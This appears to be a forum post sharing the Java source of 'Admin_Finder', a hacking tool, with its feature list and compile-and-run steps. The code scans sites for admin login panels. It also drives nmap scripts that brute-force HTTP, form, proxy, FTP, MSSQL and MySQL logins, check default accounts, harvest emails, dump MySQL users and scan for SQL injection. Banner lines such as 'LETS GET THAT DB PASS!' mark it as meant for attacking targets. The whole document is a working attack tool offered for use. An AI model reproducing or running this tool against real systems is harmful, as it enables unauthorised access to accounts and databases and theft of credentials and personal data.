System.out.println(url + "" + php[i] + " <-- Found");
panels.add(url + "" + php[i]);
}
}
if(panels.size() != 0)
{
System.out.println("[+] Possible Panels:");
for(int i = 0; i < panels.size(); i++)
System.out.println(panels.get(i));
} else {
System.out.print("[-] Panel was not Found. ");
}
}
catch(IOException e) {}
}
public static void ASP() {
String[] asp = {
"admin/","administrator/","moderator/","webadmin/","adminarea/","bb-admin/","adminLogin/","admin_area/","panel-administracion/","instadmin/",
"memberadmin/","administratorlogin/","adm/","account.asp","admin/account.asp","admin/index.asp","admin/login.asp","admin/admin.asp",
"admin_area/admin.asp","admin_area/login.asp","admin/account.html","admin/index.html","admin/login.html","admin/admin.html",
"admin_area/admin.html","admin_area/login.html","admin_area/index.html","admin_area/index.asp","bb-admin/index.asp","bb-admin/login.asp","bb-admin/admin.asp",
"bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","admin/controlpanel.html","admin.html","admin/cp.html","cp.html",
"administrator/index.html","administrator/login.html","administrator/account.html","administrator.html","login.html","modelsearch/login.html","moderator.html",
"moderator/login.html","moderator/admin.html","account.html","controlpanel.html","admincontrol.html","admin_login.html","panel-administracion/login.html",
"admin/home.asp","admin/controlpanel.asp","admin.asp","pages/admin/admin-login.asp","admin/admin-login.asp","admin-login.asp","admin/cp.asp","cp.asp",
"administrator/account.asp","administrator.asp","login.asp","modelsearch/login.asp","moderator.asp","moderator/login.asp","administrator/login.asp",
"moderator/admin.asp","controlpanel.asp","admin/account.html","adminpanel.html","webadmin.html","pages/admin/admin-login.html","admin/admin-login.html",
"webadmin/index.html","webadmin/admin.html","webadmin/login.html","user.asp","user.html","admincp/index.asp","admincp/login.asp","admincp/index.html",
"admin/adminLogin.html","adminLogin.html","admin/adminLogin.html","home.html","adminarea/index.html","adminarea/admin.html","adminarea/login.html",
"panel-administracion/index.html","panel-administracion/admin.html","modelsearch/index.html","modelsearch/admin.html","admin/admin_login.html",
"admincontrol/login.html","adm/index.html","adm.html","admincontrol.asp","admin/account.asp","adminpanel.asp","webadmin.asp","webadmin/index.asp",
"webadmin/admin.asp","webadmin/login.asp","admin/admin_login.asp","admin_login.asp","panel-administracion/login.asp","adminLogin.asp",
"admin/adminLogin.asp","home.asp","admin.asp","adminarea/index.asp","adminarea/admin.asp","adminarea/login.asp","admin-login.html",
"panel-administracion/index.asp","panel-administracion/admin.asp","modelsearch/index.asp" , "modelsearch/admin.asp","administrator/index.asp",
"admincontrol/login.asp","adm/admloginuser.asp","admloginuser.asp","admin2.asp","admin2/login.asp","admin2/index.asp","adm/index.asp",
"adm.asp","affiliate.asp","adm_auth.asp","memberadmin.asp","administratorlogin.asp","siteadmin/login.asp","siteadmin/index.asp","siteadmin/login.html"
};
ArrayList<String> panels = new ArrayList<String>();
try {
BufferedReader in =
new BufferedReader(
new InputStreamReader (System.in));
System.out.println("Enter the URL; Format Usage: (http://www.example.com/)");
System.out.print("SITE: " );
String url = in.readLine();
System.out.println();
for(int i = 0; i < asp.length; i++)
{
boolean scan = true;
try {
new URL(url + "" + asp[i]).getContent();
} catch(Exception e) {
System.out.println(url + "" + asp[i] + " <-- Not Found");
scan = false;
}
if(scan)
{
System.out.println(url + "" + asp[i] + " <-- Found");
panels.add(url + "" + asp[i]);
}
}
if(panels.size() != 0)
{
System.out.println("[+] Possible Panels:");
for(int i = 0; i < panels.size(); i++)
System.out.println(panels.get(i));
} else {
System.out.print("[-] Panel was not Found. ");
}
}
catch(IOException e) {}
}
public static void CFM() {
String[] cfm = {
"admin/","administrator/","moderator/","webadmin/","adminarea/","bb-admin/","adminLogin/","admin_area/","panel-administracion/","instadmin/",
"memberadmin/","administratorlogin/","adm/","account.cfm","admin/account.cfm","admin/index.cfm","admin/login.cfm","admin/admin.cfm",
"admin_area/admin.cfm","admin_area/login.cfm","admin/account.html","admin/index.html","admin/login.html","admin/admin.html",
"admin_area/admin.html","admin_area/login.html","admin_area/index.html","admin_area/index.cfm","bb-admin/index.cfm","bb-admin/login.cfm","bb-admin/admin.cfm",
"bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","admin/controlpanel.html","admin.html","admin/cp.html","cp.html",
"administrator/index.html","administrator/login.html","administrator/account.html","administrator.html","login.html","modelsearch/login.html","moderator.html",
"moderator/login.html","moderator/admin.html","account.html","controlpanel.html","admincontrol.html","admin_login.html","panel-administracion/login.html",
"admin/home.cfm","admin/controlpanel.cfm","admin.cfm","pages/admin/admin-login.cfm","admin/admin-login.cfm","admin-login.cfm","admin/cp.cfm","cp.cfm",
"administrator/account.cfm","administrator.cfm","login.cfm","modelsearch/login.cfm","moderator.cfm","moderator/login.cfm","administrator/login.cfm",
"moderator/admin.cfm","controlpanel.cfm","admin/account.html","adminpanel.html","webadmin.html","pages/admin/admin-login.html","admin/admin-login.html",
"webadmin/index.html","webadmin/admin.html","webadmin/login.html","user.cfm","user.html","admincp/index.cfm","admincp/login.cfm","admincp/index.html",
"admin/adminLogin.html","adminLogin.html","admin/adminLogin.html","home.html","adminarea/index.html","adminarea/admin.html","adminarea/login.html",
"panel-administracion/index.html","panel-administracion/admin.html","modelsearch/index.html","modelsearch/admin.html","admin/admin_login.html",
"admincontrol/login.html","adm/index.html","adm.html","admincontrol.cfm","admin/account.cfm","adminpanel.cfm","webadmin.cfm","webadmin/index.cfm",
"webadmin/admin.cfm","webadmin/login.cfm","admin/admin_login.cfm","admin_login.cfm","panel-administracion/login.cfm","adminLogin.cfm",
"admin/adminLogin.cfm","home.cfm","admin.cfm","adminarea/index.cfm","adminarea/admin.cfm","adminarea/login.cfm","admin-login.html",
"panel-administracion/index.cfm","panel-administracion/admin.cfm","modelsearch/index.cfm","modelsearch/admin.cfm","administrator/index.cfm",
"admincontrol/login.cfm","adm/admloginuser.cfm","admloginuser.cfm","admin2.cfm","admin2/login.cfm","admin2/index.cfm","adm/index.cfm",
"adm.cfm","affiliate.cfm","adm_auth.cfm","memberadmin.cfm","administratorlogin.cfm","siteadmin/login.cfm","siteadmin/index.cfm","siteadmin/login.html"
};
ArrayList<String> panels = new ArrayList<String>();
try {
BufferedReader in =
new BufferedReader(
new InputStreamReader (System.in));
System.out.println("Enter the URL; Format Usage: (http://www.example.com/)");
System.out.print("SITE: " );
String url = in.readLine();
System.out.println();
for(int i = 0; i < cfm.length; i++)
{
boolean scan = true;
try {
new URL(url + "" + cfm[i]).getContent();
} catch(Exception e) {
System.out.println(url + "" + cfm[i] + " <-- Not Found");
scan = false;
}
if(scan)
{
System.out.println(url + "" + cfm[i] + " <-- Found");
panels.add(url + "" + cfm[i]);
}
}
if(panels.size() != 0)
{
System.out.println("[+] Possible Panels:");
for(int i = 0; i < panels.size(); i++)
System.out.println(panels.get(i));
} else {
System.out.print("[-] Panel was not Found. ");
}
}
catch(IOException e) {}
}
public static void brute() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("HTTP-AUTH-BRUTE-FORCE" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script http-brute -p 80 " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void FormBrute() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("HTTP-FORUM-AUTH-BRUTE-FORCE" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script http-form-brute -p 80 " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void accounts() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("CHECKING FOR DEFAULT ACCOUNTS ON WEB APP." );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -p80 --script http-default-accounts " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void emails() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("LETS PARSE THESE PAGES FOR SOME EMAILS!" );
System.out.print("Enter Target:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script=http-email-harvest" + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void ProxyBrute() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("NEED AN EXTRA PROXY? :}" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script http-proxy-brute -p 8080 " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void mssql445() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("MSSQL-BRUTE-FORCE-ON-PORT-445" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=/nselib/data/usernames.lst,passdb=/nselib/data/passwords.lst " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void mssql1433() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("MSSQL-BRUTE-FORCE-ON-PORT-1433" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -p 1433 --script ms-sql-brute --script-args userdb=/nselib/data/usernames.lst,passdb=/nselib/data/passwords.lst " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void MysqlBrute() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("LETS GET THAT DB PASS!" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script=mysql-brute " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void MysqlUserDump() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("WHO IS USING THIS DB?" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -sV --script=mysql-users " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void SqlInject() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("SQL-INJECTION-SCAN" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -sV --script=sql-injection " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void FtpBrute() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("FTP-BRUTE-FORCE" );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap --script ftp-brute -p 21 " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void NmapScan() {
String s = null;
try {
Scanner user_input = new Scanner ( System.in );
String user_ip;
System.out.println("NORMAL-NMAP-SCAN." );
System.out.print("Enter Targets IP:" );
user_ip = user_input.next( );
Process p = Runtime.getRuntime().exec("nmap -v " + user_ip );
BufferedReader in = new BufferedReader(new
InputStreamReader(p.getInputStream()));
BufferedReader inerror = new BufferedReader(new
InputStreamReader(p.getErrorStream()));
System.out.println("Output:\n");
while ((s = in.readLine()) != null) {
System.out.println(s);
}
System.out.println("Error (if any):\n");
while ((s = inerror.readLine()) != null) {
System.out.println(s);
}
return;
}
catch (IOException e) {
System.out.println("exception happened - here's what I know: ");
e.printStackTrace();
}
System.out.println("" );
System.out.print("Press Enter to return" );
readInput();
}
public static void main(String args[])
{
InputStreamReader reader =
new InputStreamReader (System.in );
BufferedReader in =
new BufferedReader (reader );
boolean done = false;
System.out.println("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" );
System.out.println("~ ADMIN_FINDER ~" );
System.out.println("~ CODED BY SP3CT ~" );
System.out.println("~ ~" );
System.out.println("~ @Team_Digi7al ~" );
System.out.println("~ ~" );
System.out.println("~ Sp3ctrum L0GIC ~" );
System.out.println("~ Th3P0nyWizard Ichi ~" );
System.out.println("~ Shr00mi3 DR_7hor ~" );
System.out.println("~ Kalypto Th1nkT0ken ~" );
System.out.println("~ Unsp0ken n3tM0nkey ~" );
System.out.println("~ ~" );
System.out.println("~ USAGE: ~" );
System.out.println("~ [+] P - .php Scan ~" );
System.out.println("~ [+] A - .asp Scan ~" );
System.out.println("~ [+] C - .cfm Scan ~" );
System.out.println("~ [+] I - Phpinfo_Scan ~" );
System.out.println("~ [+] N - Nmap_Scan ~" );
System.out.println("~ [+] B - Brute_Panel ~" );
System.out.println("~ [+] F - Forum_Brute ~" );
System.out.println("~ [+] D - Default_Accounts ~" );
System.out.println("~ [+] E - Grab_Emails ~" );
System.out.println("~ [+] W - Proxy_Brute ~" );
System.out.println("~ [+] S - Mssql_445_Brute ~" );
System.out.println("~ [+] L - Mssql_1433_Brute ~" );
System.out.println("~ [+] O - Mysql_Brute ~" );
System.out.println("~ [+] X - Mysql_User_Dump ~" );
System.out.println("~ [+] Z - Sqli_Scan ~" );
System.out.println("~ [+] U - FTP_Brute ~" );
System.out.println("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" );
String input = readInput();
input = input.toUpperCase();
char ch = input.charAt(0);
switch ( ch )
{
case 'I':
Info();
break;
case 'N':
NmapScan();
break;
case 'U':
FtpBrute();
break;
case 'Z':
SqlInject();
break;
case 'X':
MysqlUserDump();
break;
case 'O':
MysqlBrute();
break;
case 'L':
mssql1433();
break;
case 'S':
mssql445();
break;
case 'W':
ProxyBrute();
break;
case 'E':
emails();
break;
case 'D':
accounts();
break;
case 'F':
FormBrute();
break;
case 'B':
brute();
break;
case 'P':
PHP();
break;
case 'A':
ASP();
break;
case 'C':
CFM();
break;
case 'Q':
done = true;
break;
default:
System.out.println("" );
System.out.println("Please choose a valid choice." );
}
System.out.println("" );
System.out.print("Press Enter to return to Terminal" );
readInput();
}
}
Features:
[+] .php Panel scan
[+] .asp Panel scan
[+] .cfm Panel scan
[+] Phpinfo scan
[+] Nmap Single Target scan
[+] Brute Force Attack on Panel
[+] Http Forum Brute
[+] Default Account check on Web Applications
[+] Email Harvest
[+] Proxy Auth. Brute
[+] Mssql port 445 Brute
[+] Mssql port 1433 Brute
[+] Mysql Auth. Brute
[+] Sql Injection scan
[+] Ftp Auth. Brute
Now to have the full features of this script, you must have latest version of nmap installed on your computer. This script uses some of nmaps .nse scripts to run the features. But just as important you must have Java Installed. Linux users shouldnt have a problem with this, but windows users need to Install Java if not already installed. Also Java JDK needs to be installed not JRE so remember this when your downloading window's users. JDK!!!
Nmap Download:
http://nmap.org/download.html
Java Download:
http://www.oracle.com/technetwork/java/j...index.html
Java admin scanner code:
Finder - Pastebin.com (http://pastebin.com/G2LdsKC0)
~1) Now copy and paste the code to a text file and name it Admin_Finder.java and save. Remember you must save it as Admin_Finder.java
~2) Open cmd or terminal and cd to the directory you saved it in.
~3) Compile the java code with the command javac Admin_Finder.java
~4) After compiling you should see a Admin_Finder.class file, that means everything compiled right and is ready to go.
~5) Finally install Nmap, make sure its working by typing Nmap into your cmd or terminal and help screen will show, then cd back to your java .class file in cmd or Terminal and to run Script type java Admin_Finder